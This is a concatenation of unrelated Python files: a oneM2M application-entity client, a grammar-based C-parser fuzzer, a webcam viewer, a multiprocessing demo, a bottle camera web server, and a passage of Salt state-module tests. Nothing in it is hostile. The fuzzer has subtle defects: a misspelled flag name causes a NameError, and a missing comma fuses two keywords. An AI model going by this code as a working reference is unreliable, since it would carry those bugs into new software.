to = '{}://{}:{}{}'.format(CSE_PROTOCOL, CSE_HOST, CSE_PORT, config_path)
params = {
OneM2MPrimitive.M2M_PARAM_FROM: pn_cse.ae.ri,
OneM2MPrimitive.M2M_PARAM_RESULT_CONTENT: 2,
OneM2MPrimitive.M2M_PARAM_RESOURCE_TYPE: OneM2MPrimitive.M2M_RESOURCE_TYPES.ContentInstance.value,
}
content_instance = content
oneM2MRequest = OneM2MRequest()
try:
response = oneM2MRequest.create(to, params, content_instance)
response.dump('Configuration Content Instance')
except requests.exceptions.HTTPError as e:
print("Error: Configuration content instance creation failed with error {}".format(e.response.status_code))
configQueue.task_done()
def saveConfig(ri):
settings.set('DEFAULT', 'ri_persistent', ri)
with open(SETTINGS_FILE, 'w') as inifile:
settings.write(inifile)
# Term signal handler to perform deregistration at shutdown.
def handleSignalTerm(signal, frame):
if pn_cse.ae is not None:
del_res = pn_cse.delete_ae()
del_res.dump('Delete AE')
saveConfig('')
sys.exit(0)
def main():
try:
signal.signal(signal.SIGTERM, handleSignalTerm)
sys.stdout.reconfigure(line_buffering=True, encoding="utf-8")
# Confirm that there isn't already an instance running, using the HTTP listening port as a lock.
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
try:
bindres = sock.bind(('', NOTIFICATION_PORT))
if bindres is not None and bindres != 0:
print('Error binding to port {}: {}'.format(NOTIFICATION_PORT, os.strerror(bindres)))
sys.exit(-1)
except socket.error as msg:
print('Error binding to port {}: {}'.format(NOTIFICATION_PORT, msg))
sys.exit(-1)
sock.close()
# Open persistent setting file, or create if it doesn't exist.
if settings.read(SETTINGS_FILE) == []:
with open(SETTINGS_FILE, 'w') as fp:
print('[DEFAULT]\nri_persistent = ', file=fp)
fp.close()
settings.read(SETTINGS_FILE)
# If we did not cleanly exit last time, clean up the previous registration before continuing.
ri_persistent = settings.get('DEFAULT', 'ri_persistent')
if ri_persistent:
print('Deregistering AE "{}" with CSE @ {}'.format(ri_persistent, CSE_HOST))
to_ae = '{}://{}:{}/PN_CSE/{}'.format(pn_cse.transport_protocol, pn_cse.host, pn_cse.port, ri_persistent)
res = pn_cse.delete_ae(to_ae, ri_persistent)
res.dump('Deregister AE')
saveConfig('')
# Create an AE instance to register with the CSE.
NOTIFICATION_URI: Final = '{}://{}:{}'.format(NOTIFICATION_PROTOCOL, NOTIFICATION_HOST, NOTIFICATION_PORT)
req_ae = AE(
{
AE.M2M_ATTR_APP_ID : APP_ID,
AE.M2M_ATTR_APP_NAME : APP_NAME,
AE.M2M_ATTR_AE_ID : AE_ID,
AE.M2M_ATTR_POINT_OF_ACCESS: [NOTIFICATION_URI],
}
)
# Start the configuration worker thread.
threading.Thread(target=configWorker, daemon=True).start()
print('Registering AE "{}" with CSE @ {}'.format(req_ae.aei, CSE_HOST))
# Register with the specified resourceName (or, if it is None, let the IN-CSE allocate one).
res = pn_cse.register_ae(req_ae, RESOURCE_NAME)
res.dump('Register AE')
if res.rsc != OneM2MPrimitive.M2M_RSC_CREATED:
print('Could not register AE\nExiting...')
sys.exit(-2)
# Save the name and RI we registered as.
rn = res.pc["m2m:ae"]["rn"]
saveConfig(res.pc["m2m:ae"]["ri"])
print('AE registration successful: {}'.format(rn))
# Example: Discover registered nodes.
# print('Discovering nodes:')
# containers = pn_cse.discover_nodes()
# containers.dump('Discover Nodes')
# print('Retrieved {} nodes\n'.format(len(containers.pc["m2m:uril"])))
# Create a new container.
print('Creating container {}/{}'.format(rn, NOTIFICATION_CONTAINER))
content = Container({'rn': NOTIFICATION_CONTAINER, 'mia': NOTIFICATION_CONTAINER_MAX_AGE})
res = pn_cse.create_resource(rn, None, content, OneM2MRequest.M2M_RCN_HIERARCHICAL_ADDRESS)
res.dump('Create Container')
# Create a subscription to the container.
print('Subscribing to container: {}/{}'.format(rn, NOTIFICATION_CONTAINER))
sub_res = pn_cse.create_subscription(rn + '/' + NOTIFICATION_CONTAINER, NOTIFICATION_SUBSCRIPTION, NOTIFICATION_URI, [3],
OneM2MRequest.M2M_RCN_HIERARCHICAL_ADDRESS)
sub_res.dump('Create Subscription')
# Get the request ID to register with the async response handler.
# NOTE The key we actually need isn't the RI, but rather the subscription URI.
request_id = sub_res.pc["m2m:uri"]
# Example: Retrieve the latest content instance.
# print('Listing content instances in container: {}'.format(rn))
# instance = pn_cse.retrieve_content_instance(rn)
# instance.dump('Instance')
# Example: Create a content instance.
# print('Creating content instance of resource {}'.format("foobar"))
# content = ContentInstance({'con': 'default content'})
# res = pn_cse.create_content_instance("foobar", content)
# res.dump('Create Content Instance')
# Callback that will be executed whenever an HTTP request is sent to localhost:8081
# and the X-M2M-RI header is set. The handler function should process the request and
# return the appropriate HTTP response to the originator.
# @todo AsyncResponseListener needs further refinement. It should work with OneM2M primitives, not
# HTTP messages directly.
# Params are aiohttp request and response instance.
# https://docs.aiohttp.org/en/stable/web_reference.html?highlight=Request#request-and-base-request
# https://docs.aiohttp.org/en/stable/web_reference.html?highlight=Response#response-classes
async def request_handler(req: web.Request, res: web.Response):
# Process request.
if req.method == 'POST' or req.body_exists():
# Modify response.
res.headers.popall('Content-Type', "")
res.headers['X-M2M-RSC'] = '2000'
res.headers['X-M2M-RI'] = req.headers.get('X-M2M-RI')
# Print and log the JSON.
body = await req.json()
if body is not None:
# Create a new log file every day, starting at 00:00:00 in the local timezone.
day_now = datetime.now(tz).strftime('%Y-%m-%d')
logFileName = NOTIFICATION_LOG_DIR + '/' + NOTIFICATION_LOG_PREFIX + day_now + NOTIFICATION_LOG_SUFFIX
with logMutex:
logFile = open(logFileName, 'a')
logFile.write('{}\n'.format(body)) # Newline-terminated, i.e. NDJSON
logFile.close()
# Parse the content into its own object, as it may be sent with double quotes instead of single.
con = json.loads(body['m2m:sgn']['nev']['rep']['m2m:cin']['con'])
duration = con['te'] - con['ts']
# If the MN-AE is reporting too frequently or infrequently, reconfigure it.
if SEND_CONFIG and (duration < 0.9 * CONFIG_CONTENT or duration > 1.1 * CONFIG_CONTENT):
cr = body['m2m:sgn']['nev']['rep']['m2m:cin']['cr']
if (cr is not None):
path = '/~/{}/{}'.format(cr, CONFIG_CONTAINER)
configQueue.put(path)
return res
print('IN-AE started')
handlerFactory = (
AsyncResponseListenerFactory(NOTIFICATION_HOST, NOTIFICATION_PORT)
)
handler = handlerFactory.get_instance()
handler.set_rqi_cb(
request_id, request_handler
) # Map request ID to corresponding handler function.
handler.run()
except Exception as err:
print('Exception raised...\n')
print(err)
# Not every exception carries a 'response' attribute (HTTP errors from requests do), so guard the access.
response = getattr(err, 'response', None)
if response is not None and getattr(response, 'text', None) is not None:
print(response.text)
finally:
print('Cleaning up...')
# Clean up AE.
if pn_cse.ae is not None:
del_res = pn_cse.delete_ae()
del_res.dump('Delete AE')
saveConfig('')
if __name__ == '__main__':
main()
|
fuzzer.py
|
#!/usr/bin/env python3
import random
import subprocess
import os
import re
from sys import argv
import threading
# number of terms to generate
TERM_NUM = 50
PATH_TO_C4 = os.path.join("..","build","debug", "c4")
EXECUTION_COMMAND = PATH_TO_C4 + " --parse {}"
FILTER_FUNC_RETURN = True
FILTER_VOID_FIELD = True
ONLY_NEGATIVE = False
NO_SEGMANTION_FAULT = False
NO_ASSERTION = False
NO_STRUCT = True
NO_KEYWORDS = True
KEYWORD_FILTER = ["auto", "break", "case", "default", "do", "double", "else", "enum", "float", "for", "goto", "if", "inline"
"long", "register", "restrict", "return", "short", "signed", "sizeof", "static", "switch", "typedef", "union",
"unsigned", "volitale", "while", "_Alignas", "_Alignof", "_Atomic", "_Bool", "_Complex", "_Generic", "_Imaginary",
"_Noreturn", "_Static_assert", "_Thread_local"]
ident_reg = re.compile("[A-Za-z_]")
num_reg = re.compile("-n ([0-9]+)")
term_colours = True
print_lock = threading.Lock()
START_SYMBOL = "$START"
MAX_SYMBOLS = 20
MAX_TRIES = 100000
grammar = {
"$START" : ["$TOP-DECLARATION"],
"$TOP-DECLARATION" : ["$DECLARATION-SPECIFIERS;", "$DECLARATION-SPECIFIERS $DECLARATOR;"],
"$DECLARATOR" : ["$POINTER$DIRECT-DECLARATOR", "$DIRECT-DECLARATOR"],
"$DIRECT-DECLARATOR" : ["$IDENTIFIER", "($DECLARATOR)",
"$DIRECT-DECLARATOR ($PARAM-TYPE-LIST)"],
"$POINTER" : ["*", "*$POINTER"],
"$PARAM-TYPE-LIST" : ["$PARAM-LIST"],
"$PARAM-LIST" : ["$PARAM-DECLARATION", "$PARAM-LIST, $PARAM-DECLARATION"],
"$PARAM-DECLARATION" : ["$DECLARATION-SPECIFIERS $DECLARATOR",
"$DECLARATION-SPECIFIERS",
"$DECLARATION-SPECIFIERS $ABSTRACT-DECLARATOR"],
"$IDENTIFIER" : ["$IDENT-NONDIGIT", "$IDENTIFIER$IDENT-NONDIGIT",
"$IDENTIFIER$DIGIT"],
"$IDENT-NONDIGIT" : [a for a in "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_"],
"$DIGIT" : [a for a in "0123456789"],
"$DECLARATION-SPECIFIERS" : ["$TYPE-SPECIFIER"],
"$TYPE-SPECIFIER" : ["void", "char", "int"] + (["$STRUCT"] if "--struct" in argv else []),
"$STRUCT" : ["struct $IDENTIFIER", "struct $IDENTIFIER {$STR-DECL-LIST}"],
"$STR-DECL-LIST" : ["$STRU-DECL", "$STR-DECL-LIST $STRU-DECL"],
"$STRU-DECL" : ["$TYPE-SPECIFIER;", "$TYPE-SPECIFIER $ST-DECLARATOR-LIST;"],
"$ST-DECLARATOR-LIST" : ["$S-DECLARATOR", "$ST-DECLARATOR-LIST, $S-DECLARATOR"],
"$S-DECLARATOR" : ["$DECLARATOR"],
"$ABSTRACT-DECLARATOR" : ["$POINTER", "$POINTER$DIRECT-ABS-DECLARATOR", "$DIRECT-ABS-DECLARATOR"],
"$DIRECT-ABS-DECLARATOR" : ["($ABSTRACT-DECLARATOR)", "$DIRECT-ABS-DECLARATOR ($PARAM-TYPE-LIST)",
"()", "$DIRECT-ABS-DECLARATOR()", "($PARAM-TYPE-LIST)"]
}
class colour():
def __init__(self):
self.green = "\033[92m"
self.red = "\033[91m"
self.yellow = "\033[93m"
self.default = "\033[0m"
def enable(self):
self.__init__()
def disable(self):
self.green = ""
self.red = ""
self.yellow = ""
self.default = ""
c = colour()
def apply_subst(term, rule):
old, new = rule
return term.replace(old, new, 1)
def create_term(grammar):
term = START_SYMBOL
tries = 0
while term.count("$") > 0:
to_subst = random.choice(list(grammar.keys()))
subst = random.choice(grammar[to_subst])
new_term = apply_subst(term, (to_subst, subst))
if term != new_term and term.count("$") < MAX_SYMBOLS:
term = new_term
tries = 0
else:
tries += 1
if tries > MAX_TRIES:
raise RuntimeError
return term
def term_filter(term):
reduced_term = term.replace("int", "").replace("void", "").replace("char", "")
return bool(ident_reg.search(reduced_term))
def output_filter(output):
if FILTER_FUNC_RETURN and "Function may not return another function!" in output:
return False
if FILTER_VOID_FIELD and "variable or field declared void" in output:
return False
if NO_SEGMENTATION_FAULT and "Segmentation" in output:
return False
if NO_ASSERTION and "Assertion" in output:
return False
if NO_KEYWORDS:
for keyword in KEYWORD_FILTER:
if "\"{}\"".format(keyword) in output:
return False
return True
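# Worker body for one fuzzing thread: keep generating candidate terms until one passes
# term_filter, write it to a per-thread temp file, run the c4 parser on it, apply the
# configured output filters, and print the colourised verdict under print_lock before
# cleaning up the temporary source and .ll files.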
def test_term(id):
work = True
term = str()
while work:
try:
term = create_term(grammar)
except RuntimeError:
continue
if not term_filter(term):
continue
path_to_content = os.path.join(".", "cnt{}.tmp".format(id))
with open(path_to_content, "w") as cnt:
cnt.write(term)
process = subprocess.Popen(EXECUTION_COMMAND.format(path_to_content), stderr=subprocess.PIPE, shell=True)
output, err = process.communicate()
err = err.decode("utf8")
exit_code = process.wait()
if ONLY_NEGATIVE and exit_code == 0:
continue
if not output_filter(err):
continue
print_lock.acquire()
try:
print("{}: {}".format(c.green + "SUCCESS" + c.default if exit_code==0 else c.red + "FAILURE" + c.default, term))
if err:
print(c.yellow + "ERROR MESSAGE:" + c.default +" {}".format(err))
finally:
print_lock.release()
try:
os.remove(path_to_content)
os.remove(path_to_content[:-3] + "ll")
except:
pass
break
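# Command-line flags handled below: --no-colour disables ANSI colours, --struct allows
# struct declarations in the grammar, --func-return / --void-field stop filtering those
# diagnostics, --no-seg / --no-assert hide segfaults and assertion failures, --only-neg
# shows only failing cases, --keywords disables keyword filtering, and "-n <count>" sets
# the number of generated terms (one thread each). Illustrative invocation only:
# python3 fuzzer.py -n 100 --no-colour --only-neg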
if __name__ == "__main__":
# disables colours
if "--no-colour" in argv:
c.disable()
# enables structs
if "--struct" in argv:
NO_STRUCT = False
# enables report for errors for function return types
if "--func-return" in argv:
FILTER_FUNC_RETURN = False
# enables report for void field errors
if "--void-field" in argv:
FILTER_VOID_FIELD = False
# disables report for segmentation faults
if "--no-seg" in argv:
NO_SEGMENTATION_FAULT = True
# disables report for assertion fails
if "--no-assert" in argv:
NO_ASSERTION = True
# only shows failed test cases
if "--only-neg" in argv:
ONLY_NEGATIVE = True
# disables filtering of keywords
if "--keywords" in argv:
NO_KEYWORDS = False
# -n for number of finished tests
for i in range(len(argv)):
if argv[i] == "-n" and i+1 < len(argv):
if argv[i + 1].isdecimal():
TERM_NUM = int(argv[i+1])
threads = list()
for i in range(TERM_NUM):
threads.append(threading.Thread(target=test_term, args=[i]))
threads[i].start()
for thread in threads:
thread.join()
|
camera_in_frame.py
|
from PIL import Image
from PIL import ImageTk
import mediapipe as mp
import numpy as np
import tkinter as tk
import threading
import datetime
import cv2
import os
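# camcam starts a daemon thread that grabs frames from the default webcam with OpenCV,
# converts them from BGR to RGB, and pushes them into a tkinter Label, while the main
# thread runs the Tk event loop. Note that updating Tk widgets from a worker thread is
# not strictly thread-safe; a more robust design would hand frames to the main loop via
# root.after() or a queue.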
def camcam():
def camThread():
color = []
cap = cv2.VideoCapture(0)
cap.set(cv2.CAP_PROP_FRAME_WIDTH, 640) # adjust camera frame size
cap.set(cv2.CAP_PROP_FRAME_HEIGHT, 480)
panel = None
if not cap.isOpened():
print("Unable to read camera feed")
while True:
ret, color = cap.read()
if ret and color is not None: # comparing the frame to [] is unreliable for numpy arrays
image = cv2.cvtColor(color, cv2.COLOR_BGR2RGB)
image = Image.fromarray(image)
image = ImageTk.PhotoImage(image)
if panel is None:
panel = tk.Label(image=image)
panel.image = image
panel.pack(side="left")
else:
panel.configure(image=image)
panel.image = image
cv2.waitKey(1)
if __name__ == '__main__':
thread_img = threading.Thread(target=camThread, args=())
thread_img.daemon = True
thread_img.start()
root = tk.Tk()
root.title("Hand Figuration")
root.geometry('1920x1080')
root.minsize(1768,992)
root.maxsize(2560,1440)
root.mainloop()
camcam()
|
process_example.py
|
from multiprocessing import Process
def print_func(continent='Asia'):
print('The name of continent is : ', continent)
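# The __main__ guard matters here: with spawn-based start methods (Windows, and macOS by
# default on recent Python versions) child processes re-import this module, and without
# the guard they would recursively try to launch more processes.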
if __name__ == "__main__": # confirms that the code is under main function
names = ['America', 'Europe', 'Africa']
procs = []
proc = Process(target=print_func) # instantiating without any argument
procs.append(proc)
proc.start()
# instantiating process with arguments
for name in names:
# print(name)
proc = Process(target=print_func, args=(name,))
procs.append(proc)
proc.start()
# complete the processes
for proc in procs:
proc.join()
|
webserver.py
|
import threading
import logging
from bottle import route, view, static_file, run, ServerAdapter, request, response
import settings
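# start_server wires everything together: it registers the bottle routes against the
# camera communication object, spawns a listener thread that waits for a "terminate"
# message on the supplied pipe, runs the (blocking) bottle server, and joins the
# listener thread once the server has stopped.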
def start_server(pipe, cam_comm):
setup(cam_comm)
t = start_stopper_listener(pipe)
logging.info("Starting web server...")
start_listening()
logging.info("Web server stopped!")
t.join()
logging.info("Server terminated.")
def start_listening():
run(server=server)
def start_stopper_listener(pipe):
t = threading.Thread(target=_stopper_listener, args=(pipe,), name="Webserver Stopper Listener")
t.start()
return t
def _stopper_listener(pipe):
while True:
msg = pipe.recv()
if isinstance(msg, str) and msg == "terminate":
logging.info("Received terminate command - stopping")
server.stop()
break
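# setup() registers the bottle routes: the main page (rendered from the "main" view),
# a raw segment download that uses the X-last-received-segment request header and the
# X-segment-name response header, start/stop recording endpoints, and a static file route.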
def setup(cam_comm):
@route("/")
@view("main")
def main():
return {
"isRecording": cam_comm.is_recording(),
"segmentLengthSeconds": settings.RECORDINGS_FRAMES_PER_FILE / settings.CAMERA_FPS
}
@route("/segment")
def segment():
last_received = request.get_header("X-last-received-segment")
(filename, segment) = cam_comm.segment(last_received)
response.set_header("X-segment-name", filename)
return segment
@route("/recording/start")
def start_recording():
cam_comm.start_recording()
@route("/recording/stop")
def stop_recording():
cam_comm.stop_recording()
@route("/static/<name>")
def static(name):
return static_file(name, root="./static")
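# MyWSGIRefServer subclasses bottle's ServerAdapter so the wsgiref server instance is kept
# on self and can be stopped cleanly from another thread via server.shutdown(). It also
# mirrors the stock WSGIRefServer tweaks: skip reverse DNS lookups in access logs, honour
# the quiet flag, and fall back to AF_INET6 when the host contains a ':' but the configured
# server class is IPv4-only.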
class MyWSGIRefServer(ServerAdapter):
def run(self, app): # pragma: no cover
from wsgiref.simple_server import WSGIRequestHandler, WSGIServer
from wsgiref.simple_server import make_server
import socket
class FixedHandler(WSGIRequestHandler):
def address_string(self): # Prevent reverse DNS lookups please.
return self.client_address[0]
def log_request(*args, **kw):
if not self.quiet:
return WSGIRequestHandler.log_request(*args, **kw)
handler_cls = self.options.get('handler_class', FixedHandler)
server_cls = self.options.get('server_class', WSGIServer)
if ':' in self.host: # Fix wsgiref for IPv6 addresses.
if getattr(server_cls, 'address_family') == socket.AF_INET:
class server_cls(server_cls):
address_family = socket.AF_INET6
self.server = make_server(self.host, self.port, app, server_cls, handler_cls)
self.server.serve_forever()
def stop(self):
# self.server.server_close() <--- alternative but causes bad fd exception
self.server.shutdown()
server = MyWSGIRefServer(host="0.0.0.0", port=settings.WEBSERVER_PORT)
server.quiet = True
server.debug = True
|
test_state.py
|
# -*- coding: utf-8 -*-
# Import Python libs
from __future__ import absolute_import, print_function, unicode_literals
import logging
import os
import shutil
import sys
import tempfile
import textwrap
import threading
import time
# Import Salt Testing libs
from tests.support.case import ModuleCase
from tests.support.helpers import with_tempdir
from tests.support.unit import skipIf
from tests.support.paths import BASE_FILES, TMP, TMP_PILLAR_TREE
from tests.support.mixins import SaltReturnAssertsMixin
# Import Salt libs
import salt.utils.atomicfile
import salt.utils.files
import salt.utils.path
import salt.utils.platform
import salt.utils.stringutils
from salt.modules.virtualenv_mod import KNOWN_BINARY_NAMES
# Import 3rd-party libs
from salt.ext import six
log = logging.getLogger(__name__)
DEFAULT_ENDING = salt.utils.stringutils.to_bytes(os.linesep)
def trim_line_end(line):
'''
Remove CRLF or LF from the end of line.
'''
if line[-2:] == salt.utils.stringutils.to_bytes('\r\n'):
return line[:-2]
elif line[-1:] == salt.utils.stringutils.to_bytes('\n'):
return line[:-1]
raise Exception("Invalid line ending")
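# reline rewrites `source` into a temporary file with every line terminated by `ending`,
# then renames the temp file onto `dest`; an existing `dest` is removed first only when
# force=True.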
def reline(source, dest, force=False, ending=DEFAULT_ENDING):
'''
Normalize the line endings of a file.
'''
fp, tmp = tempfile.mkstemp()
os.close(fp)
with salt.utils.files.fopen(tmp, 'wb') as tmp_fd:
with salt.utils.files.fopen(source, 'rb') as fd:
lines = fd.readlines()
for line in lines:
line_noend = trim_line_end(line)
tmp_fd.write(line_noend + ending)
if os.path.exists(dest) and force:
os.remove(dest)
os.rename(tmp, dest)
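# The test class below normalizes the testappend/firstif and testappend/secondif fixture
# files to the platform's line ending in setUpClass, so the file.append comparisons behave
# the same on Windows and POSIX systems.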
class StateModuleTest(ModuleCase, SaltReturnAssertsMixin):
'''
Validate the state module
'''
maxDiff = None
@classmethod
def setUpClass(cls):
def _reline(path, ending=DEFAULT_ENDING):
'''
Normalize the line endings of a file.
'''
with salt.utils.files.fopen(path, 'rb') as fhr:
lines = fhr.read().splitlines()
with salt.utils.atomicfile.atomic_open(path, 'wb') as fhw:
for line in lines:
fhw.write(line + ending)
destpath = os.path.join(BASE_FILES, 'testappend', 'firstif')
_reline(destpath)
destpath = os.path.join(BASE_FILES, 'testappend', 'secondif')
_reline(destpath)
def test_show_highstate(self):
'''
state.show_highstate
'''
high = self.run_function('state.show_highstate')
destpath = os.path.join(TMP, 'testfile')
self.assertTrue(isinstance(high, dict))
self.assertTrue(destpath in high)
self.assertEqual(high[destpath]['__env__'], 'base')
def test_show_lowstate(self):
'''
state.show_lowstate
'''
low = self.run_function('state.show_lowstate')
self.assertTrue(isinstance(low, list))
self.assertTrue(isinstance(low[0], dict))
def test_show_states(self):
'''
state.show_states
'''
states = self.run_function('state.show_states')
self.assertTrue(isinstance(states, list))
self.assertTrue(isinstance(states[0], six.string_types))
states = self.run_function('state.show_states', sorted=False)
self.assertTrue(isinstance(states, list))
self.assertTrue(isinstance(states[0], six.string_types))
def test_catch_recurse(self):
'''
state.show_sls used to catch a recursive ref
'''
err = self.run_function('state.sls', mods='recurse_fail')
self.assertIn('recursive', err[0])
def test_no_recurse(self):
'''
verify that a sls structure is NOT a recursive ref
'''
sls = self.run_function('state.show_sls', mods='recurse_ok')
self.assertIn('snmpd', sls)
def test_no_recurse_two(self):
'''
verify that a sls structure is NOT a recursive ref
'''
sls = self.run_function('state.show_sls', mods='recurse_ok_two')
self.assertIn('/etc/nagios/nrpe.cfg', sls)
def test_running_dictionary_consistency(self):
'''
Test the structure of the running dictionary so we don't change it
without deprecating/documenting the change
'''
running_dict_fields = [
'__id__',
'__run_num__',
'__sls__',
'changes',
'comment',
'duration',
'name',
'result',
'start_time',
]
sls = self.run_function('state.single',
fun='test.succeed_with_changes',
name='gndn')
for state, ret in sls.items():
for field in running_dict_fields:
self.assertIn(field, ret)
def test_running_dictionary_key_sls(self):
'''
Ensure the __sls__ key is either null or a string
'''
sls1 = self.run_function('state.single',
fun='test.succeed_with_changes',
name='gndn')
sls2 = self.run_function('state.sls', mods='gndn')
for state, ret in sls1.items():
self.assertTrue(isinstance(ret['__sls__'], type(None)))
for state, ret in sls2.items():
self.assertTrue(isinstance(ret['__sls__'], six.string_types))
def _remove_request_cache_file(self):
'''
remove minion state request file
'''
cache_file = os.path.join(self.get_config('minion')['cachedir'], 'req_state.p')
if os.path.exists(cache_file):
os.remove(cache_file)
def test_request(self):
'''
verify sending a state request to the minion(s)
'''
self._remove_request_cache_file()
ret = self.run_function('state.request', mods='modules.state.requested')
result = ret['cmd_|-count_root_dir_contents_|-ls -a / | wc -l_|-run']['result']
self.assertEqual(result, None)
def test_check_request(self):
'''
verify checking a state request sent to the minion(s)
'''
self._remove_request_cache_file()
self.run_function('state.request', mods='modules.state.requested')
ret = self.run_function('state.check_request')
result = ret['default']['test_run']['cmd_|-count_root_dir_contents_|-ls -a / | wc -l_|-run']['result']
self.assertEqual(result, None)
def test_clear_request(self):
'''
verify clearing a state request sent to the minion(s)
'''
self._remove_request_cache_file()
self.run_function('state.request', mods='modules.state.requested')
ret = self.run_function('state.clear_request')
self.assertTrue(ret)
def test_run_request_succeeded(self):
'''
verify running a state request sent to the minion(s)
'''
self._remove_request_cache_file()
if salt.utils.platform.is_windows():
self.run_function('state.request', mods='modules.state.requested_win')
else:
self.run_function('state.request', mods='modules.state.requested')
ret = self.run_function('state.run_request')
if salt.utils.platform.is_windows():
key = 'cmd_|-count_root_dir_contents_|-Get-ChildItem C:\\\\ | Measure-Object | %{$_.Count}_|-run'
else:
key = 'cmd_|-count_root_dir_contents_|-ls -a / | wc -l_|-run'
result = ret[key]['result']
self.assertTrue(result)
def test_run_request_failed_no_request_staged(self):
'''
verify not running a state request sent to the minion(s)
'''
self._remove_request_cache_file()
self.run_function('state.request', mods='modules.state.requested')
self.run_function('state.clear_request')
ret = self.run_function('state.run_request')
self.assertEqual(ret, {})
@with_tempdir()
def test_issue_1896_file_append_source(self, base_dir):
'''
Verify that we can append a file's contents
'''
testfile = os.path.join(base_dir, 'test.append')
ret = self.run_state('file.touch', name=testfile)
self.assertSaltTrueReturn(ret)
ret = self.run_state(
'file.append',
name=testfile,
source='salt://testappend/firstif')
self.assertSaltTrueReturn(ret)
ret = self.run_state(
'file.append',
name=testfile,
source='salt://testappend/secondif')
self.assertSaltTrueReturn(ret)
with salt.utils.files.fopen(testfile, 'r') as fp_:
testfile_contents = salt.utils.stringutils.to_unicode(fp_.read())
contents = textwrap.dedent('''\
# set variable identifying the chroot you work in (used in the prompt below)
if [ -z "$debian_chroot" ] && [ -r /etc/debian_chroot ]; then
debian_chroot=$(cat /etc/debian_chroot)
fi
# enable bash completion in interactive shells
if [ -f /etc/bash_completion ] && ! shopt -oq posix; then
. /etc/bash_completion
fi
''')
if salt.utils.platform.is_windows():
new_contents = contents.splitlines()
contents = os.linesep.join(new_contents)
contents += os.linesep
self.assertMultiLineEqual(contents, testfile_contents)
ret = self.run_state(
'file.append',
name=testfile,
source='salt://testappend/secondif')
self.assertSaltTrueReturn(ret)
ret = self.run_state(
'file.append',
name=testfile,
source='salt://testappend/firstif')
self.assertSaltTrueReturn(ret)
with salt.utils.files.fopen(testfile, 'r') as fp_:
testfile_contents = salt.utils.stringutils.to_unicode(fp_.read())
self.assertMultiLineEqual(contents, testfile_contents)
def test_issue_1876_syntax_error(self):
'''
verify that we catch the following syntax error::
/tmp/salttest/issue-1876:
file:
- managed
- source: salt://testfile
file.append:
- text: foo
'''
testfile = os.path.join(TMP, 'issue-1876')
sls = self.run_function('state.sls', mods='issue-1876')
self.assertIn(
'ID \'{0}\' in SLS \'issue-1876\' contains multiple state '
'declarations of the same type'.format(testfile),
sls
)
def test_issue_1879_too_simple_contains_check(self):
expected = textwrap.dedent('''\
# set variable identifying the chroot you work in (used in the prompt below)
if [ -z "$debian_chroot" ] && [ -r /etc/debian_chroot ]; then
debian_chroot=$(cat /etc/debian_chroot)
fi
# enable bash completion in interactive shells
if [ -f /etc/bash_completion ] && ! shopt -oq posix; then
. /etc/bash_completion
fi
''')
if salt.utils.platform.is_windows():
new_contents = expected.splitlines()
expected = os.linesep.join(new_contents)
expected += os.linesep
testfile = os.path.join(TMP, 'issue-1879')
# Delete the file if it already exists
if os.path.isfile(testfile):
os.unlink(testfile)
# Create the file
ret = self.run_function('state.sls', mods='issue-1879', timeout=120)
self.assertSaltTrueReturn(ret)
# The first append
ret = self.run_function(
'state.sls', mods='issue-1879.step-1', timeout=120
)
self.assertSaltTrueReturn(ret)
# The second append
ret = self.run_function(
'state.sls', mods='issue-1879.step-2', timeout=120
)
self.assertSaltTrueReturn(ret)
# Does it match?
try:
with salt.utils.files.fopen(testfile, 'r') as fp_:
contents = salt.utils.stringutils.to_unicode(fp_.read())
self.assertMultiLineEqual(expected, contents)
# Make sure we don't re-append existing text
ret = self.run_function(
'state.sls', mods='issue-1879.step-1', timeout=120
)
self.assertSaltTrueReturn(ret)
ret = self.run_function(
'state.sls', mods='issue-1879.step-2', timeout=120
)
self.assertSaltTrueReturn(ret)
with salt.utils.files.fopen(testfile, 'r') as fp_:
contents = salt.utils.stringutils.to_unicode(fp_.read())
self.assertMultiLineEqual(expected, contents)
except Exception:
if os.path.exists(testfile):
shutil.copy(testfile, testfile + '.bak')
raise
finally:
if os.path.exists(testfile):
os.unlink(testfile)
def test_include(self):
tempdir = tempfile.mkdtemp(dir=TMP)
self.addCleanup(shutil.rmtree, tempdir, ignore_errors=True)
pillar = {}
for path in ('include-test', 'to-include-test', 'exclude-test'):
pillar[path] = os.path.join(tempdir, path)
ret = self.run_function('state.sls', mods='include-test', pillar=pillar)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isfile(pillar['include-test']))
self.assertTrue(os.path.isfile(pillar['to-include-test']))
self.assertFalse(os.path.isfile(pillar['exclude-test']))
def test_exclude(self):
tempdir = tempfile.mkdtemp(dir=TMP)
self.addCleanup(shutil.rmtree, tempdir, ignore_errors=True)
pillar = {}
for path in ('include-test', 'exclude-test', 'to-include-test'):
pillar[path] = os.path.join(tempdir, path)
ret = self.run_function('state.sls', mods='exclude-test', pillar=pillar)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isfile(pillar['include-test']))
self.assertTrue(os.path.isfile(pillar['exclude-test']))
self.assertFalse(os.path.isfile(pillar['to-include-test']))
@skipIf(salt.utils.path.which_bin(KNOWN_BINARY_NAMES) is None, 'virtualenv not installed')
def test_issue_2068_template_str(self):
venv_dir = os.path.join(
TMP, 'issue-2068-template-str'
)
try:
ret = self.run_function(
'state.sls', mods='issue-2068-template-str-no-dot',
timeout=120
)
self.assertSaltTrueReturn(ret)
finally:
if os.path.isdir(venv_dir):
shutil.rmtree(venv_dir)
# Let's load the template from the filesystem. If running this state
# with state.sls works, so should using state.template_str
template_path = os.path.join(
os.path.dirname(os.path.dirname(__file__)),
'files', 'file', 'base', 'issue-2068-template-str-no-dot.sls'
)
with salt.utils.files.fopen(template_path, 'r') as fp_:
template = salt.utils.stringutils.to_unicode(fp_.read())
ret = self.run_function(
'state.template_str', [template], timeout=120
)
self.assertSaltTrueReturn(ret)
# Now using state.template
ret = self.run_function(
'state.template', [template_path], timeout=120
)
self.assertSaltTrueReturn(ret)
# Now the problematic #2068 including dot's
ret = self.run_function(
'state.sls', mods='issue-2068-template-str', timeout=120
)
self.assertSaltTrueReturn(ret)
# Let's load the template from the filesystem. If running this state
# with state.sls works, so should using state.template_str
template_path = os.path.join(
os.path.dirname(os.path.dirname(__file__)),
'files', 'file', 'base', 'issue-2068-template-str.sls'
)
with salt.utils.files.fopen(template_path, 'r') as fp_:
template = salt.utils.stringutils.to_unicode(fp_.read())
ret = self.run_function(
'state.template_str', [template], timeout=120
)
self.assertSaltTrueReturn(ret)
# Now using state.template
